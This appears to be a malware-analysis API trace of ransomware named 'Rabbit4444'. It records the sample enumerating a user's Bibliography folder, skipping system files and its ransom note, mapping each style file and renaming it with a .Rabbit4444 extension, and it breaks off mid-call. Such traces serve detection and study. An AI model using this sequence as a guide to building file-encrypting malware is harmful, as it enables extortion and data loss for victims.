dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.369] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.372] FlushFileBuffers (hFile=0x27c) returned 1 [0053.373] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.373] CloseHandle (hObject=0x27c) returned 1 [0053.373] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography") returned 54 [0053.373] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.373] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0f124, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d35364, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe921cd0a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0053.373] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.373] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.374] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.374] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.374] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0f124, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d35364, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe921cd0a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.374] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.374] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.374] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.374] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.374] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.374] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe921cd0a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe921cd0a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe921cd0a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.374] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.374] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.374] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d35364, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d35364, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2e40435, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0053.374] lstrcmpiW (lpString1="Style", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.374] lstrcmpiW (lpString1="Style", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.374] lstrcmpiW (lpString1="Style", lpString2="Rabbit4444.exe") returned 1 [0053.374] lstrcmpiW (lpString1="Style", lpString2=".") returned 1 [0053.374] lstrcmpiW (lpString1="Style", lpString2="..") returned 1 [0053.374] lstrcmpiW (lpString1="Style", lpString2="windows") returned -1 [0053.374] lstrcmpiW (lpString1="Style", lpString2="bootmgr") returned 1 [0053.374] lstrcmpiW (lpString1="Style", lpString2="pagefile.sys") returned 1 [0053.374] lstrcmpiW (lpString1="Style", lpString2="boot") returned 1 [0053.374] lstrcmpiW (lpString1="Style", lpString2="ids.txt") returned 1 [0053.374] lstrcmpiW (lpString1="Style", lpString2="NTUSER.DAT") returned 1 [0053.374] lstrcpyW (in: lpString1=0x130eba6, lpString2="Style" | out: lpString1="Style") returned="Style" [0053.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7a) returned 0x102040 [0053.374] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6590 [0053.375] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d35364, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d35364, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2e40435, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 0 [0053.375] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0053.375] lstrcpyW (in: lpString1=0x130eba6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.375] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.377] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.377] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.377] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.377] CloseHandle (hObject=0x278) returned 1 [0053.377] CloseHandle (hObject=0x27c) returned 1 [0053.377] GetCurrentThreadId () returned 0xd98 [0053.377] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.377] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0053.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0053.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.377] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0053.377] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\" [0053.377] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\.BFC0E91B00AE8A0620D3" [0053.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.380] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.383] FlushFileBuffers (hFile=0x27c) returned 1 [0053.384] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.384] CloseHandle (hObject=0x27c) returned 1 [0053.384] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned 60 [0053.384] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.385] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d35364, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e40435, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe9242fb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0053.385] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.385] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.385] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.385] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.385] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d35364, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e40435, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe9242fb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.385] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.385] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.385] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.385] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.385] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.385] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9242fb9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9242fb9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9242fb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.385] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.385] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.385] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d35364, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d35364, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x1f7c60e, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="Rabbit4444.exe") returned -1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2=".") returned 1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="..") returned 1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="windows") returned -1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="bootmgr") returned -1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="pagefile.sys") returned -1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="boot") returned -1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="ids.txt") returned -1 [0053.385] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="NTUSER.DAT") returned -1 [0053.385] lstrcpyW (in: lpString1=0x130ebb2, lpString2="APASixthEditionOfficeOnline.xsl" | out: lpString1="APASixthEditionOfficeOnline.xsl") returned="APASixthEditionOfficeOnline.xsl" [0053.385] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl", dwFileAttributes=0x0) returned 1 [0053.386] lstrlenW (lpString="APASixthEditionOfficeOnline.xsl") returned 31 [0053.386] lstrlenW (lpString="Rabbit4444") returned 10 [0053.386] lstrcmpiW (lpString1="Online.xsl", lpString2="Rabbit4444") returned -1 [0053.386] lstrlenW (lpString=".dll") returned 4 [0053.386] lstrcmpiW (lpString1=".xsl", lpString2=".dll") returned 1 [0053.386] lstrlenW (lpString=".lnk") returned 4 [0053.386] lstrcmpiW (lpString1=".xsl", lpString2=".lnk") returned 1 [0053.386] lstrlenW (lpString=".ini") returned 4 [0053.386] lstrcmpiW (lpString1=".xsl", lpString2=".ini") returned 1 [0053.386] lstrlenW (lpString=".sys") returned 4 [0053.386] lstrcmpiW (lpString1=".xsl", lpString2=".sys") returned 1 [0053.386] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.386] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.386] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14469697609) returned 1 [0053.386] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=333602) returned 1 [0053.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0053.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0053.386] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x51a30, lpName=0x0) returned 0x298 [0053.387] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x51a30) returned 0x2b0000 [0053.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0053.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0053.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0053.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0053.398] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14470909295) returned 1 [0053.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0053.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0053.398] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0053.401] CloseHandle (hObject=0x298) returned 1 [0053.401] CloseHandle (hObject=0x278) returned 1 [0053.402] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl.Rabbit4444") returned 103 [0053.402] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.402] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d5b719, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d5b719, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2120015, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="Rabbit4444.exe") returned -1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2=".") returned 1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="..") returned 1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="windows") returned -1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="bootmgr") returned 1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="pagefile.sys") returned -1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="boot") returned 1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="ids.txt") returned -1 [0053.402] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="NTUSER.DAT") returned -1 [0053.402] lstrcpyW (in: lpString1=0x130ebb2, lpString2="CHICAGO.XSL" | out: lpString1="CHICAGO.XSL") returned="CHICAGO.XSL" [0053.403] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL", dwFileAttributes=0x0) returned 1 [0053.403] lstrlenW (lpString="CHICAGO.XSL") returned 11 [0053.403] lstrlenW (lpString="Rabbit4444") returned 10 [0053.403] lstrcmpiW (lpString1="HICAGO.XSL", lpString2="Rabbit4444") returned -1 [0053.403] lstrlenW (lpString=".dll") returned 4 [0053.403] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0053.403] lstrlenW (lpString=".lnk") returned 4 [0053.403] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0053.403] lstrlenW (lpString=".ini") returned 4 [0053.403] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0053.403] lstrlenW (lpString=".sys") returned 4 [0053.403] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0053.403] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.403] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.403] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14471398569) returned 1 [0053.403] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=297017) returned 1 [0053.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0053.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0053.403] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x48b40, lpName=0x0) returned 0x298 [0053.404] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x48b40) returned 0x70000 [0053.417] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.417] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0053.417] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.417] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0053.417] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.417] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0053.417] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.417] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0053.417] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14472823799) returned 1 [0053.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0053.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0053.418] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.420] CloseHandle (hObject=0x298) returned 1 [0053.420] CloseHandle (hObject=0x278) returned 1 [0053.420] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL.Rabbit4444") returned 83 [0053.420] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.421] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d81993, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d81993, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x23a87e3, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2="Rabbit4444.exe") returned -1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2=".") returned 1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2="..") returned 1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2="windows") returned -1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2="bootmgr") returned 1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2="pagefile.sys") returned -1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2="boot") returned 1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2="ids.txt") returned -1 [0053.421] lstrcmpiW (lpString1="GB.XSL", lpString2="NTUSER.DAT") returned -1 [0053.421] lstrcpyW (in: lpString1=0x130ebb2, lpString2="GB.XSL" | out: lpString1="GB.XSL") returned="GB.XSL" [0053.421] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL", dwFileAttributes=0x0) returned 1 [0053.422] lstrlenW (lpString="GB.XSL") returned 6 [0053.422] lstrlenW (lpString="Rabbit4444") returned 10 [0053.422] lstrcmpiW (lpString1="\x03ꀀ", lpString2="Rabbit4444") returned 1 [0053.422] lstrlenW (lpString=".dll") returned 4 